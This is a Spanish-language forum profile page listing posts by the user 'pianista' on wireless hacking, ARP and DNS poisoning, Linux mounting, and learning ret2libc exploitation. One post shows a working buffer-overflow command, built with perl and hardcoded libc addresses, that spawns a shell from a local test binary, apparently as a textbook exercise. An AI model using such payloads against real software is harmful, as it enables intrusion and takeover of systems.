Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - pianista

#51
Hacking Wireless / Re: Handshake
3 Marzo 2012, 18:20 PM
O con una granja de servidores, o con mucha suerte con un diccionario.

Saludos
#52
Citarnunca veo a ningun conectado solo a uno

En fin...

No sé por qué me da que tu tarjeta va a ser una intel, y que te está fallando por tirar el ataque con mon0. Una manera más simple de simular estas cosas puede ser conectarte a la red con iwconfig, lo que pasa que a veces te va a sacar tu propia clave...

Te cierro el post porque incumple las normas.

Saludos
#53
Que cree el ladrón, que todos son de su condición.

Saludos
#54
O si quieres algo más profesional, usa nmap, pero desde luego lo más fiable y lo que nunca engaá es la tabla del router.

Saludos
#55
Quiere decir que si no tienes cuidado, puede suplantarte cualquier página web y que tú creas que sea la verdadera de manera que te capture la password.

También para envenenarte la dns tiene que estarte haciendo un arp poison, por lo tanto está sniffando tu tráfico, con lo que si envías cosas sin SSL, puede ver directamente tus cookies y suplantarte en las páginas.

De todas maneras, siempre puede ser un falso positivo. Cuando te salga esos positivos, entra al router y mira si solo tú estás conectado a él, o mira tu tabla de arp para ver si sigues teniendo la misma mac de siempre en el router.

Saludos
#56
Opino que si eres capaz de hacer que el navegador no use la caché, sí.

Saludos
#57
Si no montas el disco y linux no está configurado para que los monte por tí al arrancar o al detectarlos, no podrás acceder a ninguna partición de ningún disco duro.

Para eso infórmate sobre los usos del comando mount.

También si lo tienes instalado en un modo no live, puedes tocar el /etc/fstab

Saludos
#58
Revisa tu wireless que no tengas a nadie conectado y cambia de inmediato la contraseña a una WPA y si ya la tienes, cambia tu contraseña...

Puede que sea un falso positivo del antivirus, pero quiere decir que te están direccionando a dónde quieren con los dns...

Saludos
#59
Bugs y Exploits / Re: Esta vez duda usando libc
13 Febrero 2012, 23:00 PM
Dios Ivanchuk!

Lo logré!!!!

pianista@pianista-desktop:~ $ BUF=`perl -e 'print " " x 200 . "/bin/sh;" . "A" x 516 . "\x80\x0d\xed\xb7" . "\xf0\x68\xec\xb7" . "\xbe\xc7\xfb\xb7"'`
pianista@pianista-desktop:~ $ ./victim $BUF
sh-3.2$



Muchísimas gracias.

Ya te marearé a partir de ahora con los format Strings :)

Saludos!

PD:Lo que sigo sin entender son los 200 espacios de después del /bin/sh
#60
Bugs y Exploits / Re: Esta vez duda usando libc
12 Febrero 2012, 22:04 PM
Ahhh ok.

Una duda, y entonces porque en ret2libc no lo están pasando???
(Bueno también menuda pregunta voy a hacer si ni tú ni yo hemos implementado eso xD)

El ret2libc lo corregí respecto al libro según indicaba aquí (era obvio que faltaba eso):
http://shellcoders.blogspot.com/2010/08/chapter-2-using-exploit-pp-31-38.html

Ahh y el uso de memfetch:

http://shellcoders.blogspot.com/2009/05/using-memfetch-page-37.html

Saludos y gracias por tu ayuda Ivanchuk, la verdad es que la idea de volver por ret2libc conceptualmente la tengo asimilada, el problema era que quería probarla, pero vamos me está dando tanto la lata, que lo mismo me paso ya a experimentar con los juegos con los format string